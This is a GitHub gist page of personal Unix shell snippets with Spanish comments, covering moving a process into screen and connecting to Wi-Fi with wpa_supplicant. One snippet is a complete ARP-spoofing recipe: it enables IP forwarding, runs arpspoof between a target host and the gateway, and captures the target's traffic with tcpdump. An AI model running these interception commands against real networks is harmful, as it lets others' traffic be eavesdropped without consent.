Last active
May 2, 2021 00:37
-
-
Save noapex/397109c04affa665a3bc to your computer and use it in GitHub Desktop.
unixtools
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # mandar proc a screen | |
| ctrl-z | |
| bg | |
| disown %1 | |
| screen | |
| retty |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Sniffear un ip con arp spoofing | |
| echo 1 > /proc/sys/net/ipv4/ip_forward | |
| nohup arpspoof -i $eth -t $gateway $objetive & | |
| nohup arpspoof -i $eth -t $objetive $gateway & | |
| tcpdump -nni $eth "host $objetive" -s 0 and not arp | |
| # Conf | |
| wpa_supplicant -D nl80211,wext -i wlan0 -c <(wpa_passphrase "your_SSID" "your_key") |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment